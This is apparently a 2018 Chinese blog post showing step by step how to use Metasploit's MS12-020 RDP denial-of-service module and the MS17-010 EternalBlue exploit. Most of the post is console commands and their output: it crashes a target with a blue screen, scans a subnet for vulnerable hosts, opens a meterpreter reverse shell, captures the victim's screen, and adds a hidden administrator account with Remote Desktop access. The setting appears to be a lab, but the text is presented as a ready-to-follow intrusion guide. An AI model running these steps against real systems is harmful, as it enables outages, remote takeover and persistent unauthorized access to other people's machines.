王忘杰

Metasploit(MSF)快速使用MS12-020、MS17-010(永恒之蓝)漏洞
MetasploitMetasploit是什么?Metasploit是一个免费的、可下载的框架,通过它可以很容易地...
扫描右侧二维码阅读全文
30
2018/04

Metasploit(MSF)快速使用MS12-020、MS17-010(永恒之蓝)漏洞

Metasploit

TIM截图20180430215228.png

Metasploit是什么?Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它是附带数百个已知软件漏洞的专业级漏洞攻击工具。

如果这样很难理解,我们换个说法;每天都有无数的漏洞被发现,如果我们每个人都收集几种并汇聚到一起,修改为相同的操作方式,这就是msf在做的;msf初衷是做一个攻击工具开发平台,但现在更多的情况下msf沦为了业余安全爱好者和安全专家的武器库,只需要点几下鼠标,就能入侵成功。

MS12-020

MS12-020是一个针对远程桌面(RDP)协议的漏洞,其最严重的情况可能会造成远程执行代码,而通常情况下会造成对方蓝屏。

利用方法

msfconsole 从终端进入msf框架

查找漏洞代码

msf > search 12_020
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                              Disclosure Date  Rank    Description
   ----                                              ---------------  ----    -----------
   auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  MS12-020 Microsoft Remote Desktop Use-After-Free DoS
   auxiliary/scanner/rdp/ms12_020_check                               normal  MS12-020 Microsoft Remote Desktop Checker

使用该漏洞利用代码

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 

查看使用方法

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options 

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3389             yes       The target port (TCP)

漏洞模块为auxiliary/dos/windows/rdp/ms12_020_maxchannelids
参数为 RHOST目标地址,RPORT目标端口。

设置参数

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set RHOST 192.168.136.129
RHOST => 192.168.136.129
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set RPORT 3389
RPORT => 3389
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.136.129  yes       The target address
   RPORT  3389             yes       The target port (TCP)

运行

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > exploit 

[*] 192.168.136.129:3389 - 192.168.136.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.136.129:3389 - 192.168.136.129:3389 - 210 bytes sent
[*] 192.168.136.129:3389 - 192.168.136.129:3389 - Checking RDP status...
[+] 192.168.136.129:3389 - 192.168.136.129:3389 seems down
[*] Auxiliary module execution completed

攻击完成

对方蓝屏
TIM截图20180430220452.png

MS12-020是msf中利用比较简单的一种,可以用来学习msf的框架的简单使用方法,又能快速增加入侵成功的成就感。

MS17-010(永恒之蓝)

永恒之蓝是2017年席卷全球的勒索软件的罪魁祸首,是微软近些年来最为严重的远程代码执行漏洞,可以直接获得系统权限,请所有IT从业人员在任何时候都要打满补丁以绝后患。

利用方法

进入msf框架

root@kali:~# msfconsole 

查找MS17-010相关利用代码

search 17_010
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                      Disclosure Date  Rank     Description
   ----                                      ---------------  ----     -----------
   auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                         normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

检测内网中存在漏洞的主机系统

    msf > use auxiliary/scanner/smb/smb_ms17_010 
    msf auxiliary(scanner/smb/smb_ms17_010) > show options 
    
    Module options (auxiliary/scanner/smb/smb_ms17_010):
    
       Name         Current Setting                                                 Required  Description
       ----         ---------------                                                 --------  -----------
       CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
       CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
       CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
       NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
       RHOSTS                                                                       yes       The target address range or CIDR identifier
       RPORT        445                                                             yes       The SMB service port (TCP)
       SMBDomain    .                                                               no        The Windows domain to use for authentication
       SMBPass                                                                      no        The password for the specified username
       SMBUser                                                                      no        The username to authenticate as
       THREADS      1                                                               yes       The number of concurrent threads
    
    msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.136.129/24
    RHOSTS => 192.168.136.129/24
    msf auxiliary(scanner/smb/smb_ms17_010) > exploit 
    
    
    [*] Scanned  26 of 256 hosts (10% complete)
    [*] Scanned  52 of 256 hosts (20% complete)
    [*] Scanned  77 of 256 hosts (30% complete)
    [*] Scanned 103 of 256 hosts (40% complete)
    [*] Scanned 128 of 256 hosts (50% complete)
    [+] 192.168.136.129:445   - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)

加载攻击模块

msf auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

配置

msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.136.129
RHOST => 192.168.136.129
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.136.131
LHOST => 192.168.136.131
msf exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.136.129  yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.136.131  yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

发动攻击

msf exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.136.131:4444 
[*] 192.168.136.129:445 - Connecting to target for exploitation.
[+] 192.168.136.129:445 - Connection established for exploitation.
[+] 192.168.136.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.136.129:445 - CORE raw buffer dump (53 bytes)
[*] 192.168.136.129:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.136.129:445 - 0x00000010  30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris
[*] 192.168.136.129:445 - 0x00000020  65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  e 7601 Service P
[*] 192.168.136.129:445 - 0x00000030  61 63 6b 20 31                                   ack 1           
[+] 192.168.136.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.136.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.136.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.136.129:445 - Starting non-paged pool grooming
[+] 192.168.136.129:445 - Sending SMBv2 buffers
[+] 192.168.136.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.136.129:445 - Sending final SMBv2 buffers.
[*] 192.168.136.129:445 - Sending last fragment of exploit packet!
[*] 192.168.136.129:445 - Receiving response from exploit packet
[+] 192.168.136.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.136.129:445 - Sending egg to corrupted connection.
[*] 192.168.136.129:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.131:4444 -> 192.168.136.129:49567) at 2018-04-30 23:31:53 +0800
[+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

获取对方电脑桌面

meterpreter >  screenshot
Screenshot saved to: /root/VrBAGsTE.jpeg

TIM截图20180430233320.png

获得shell权限

meterpreter > shell
Process 4088 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>

添加管理员并加入远程桌面组

net user test test123 /add
net user localgroup administrators test /add
net localgroup "Remote Desktop Users" test /add

完成入侵。

MS17-010在msf里属于中等使用难度,涉及了扫描、配置回链方式、桌面抓图、提权等手段,是非常好的学习对象。

最后修改:2018 年 07 月 21 日 08 : 50 AM

发表评论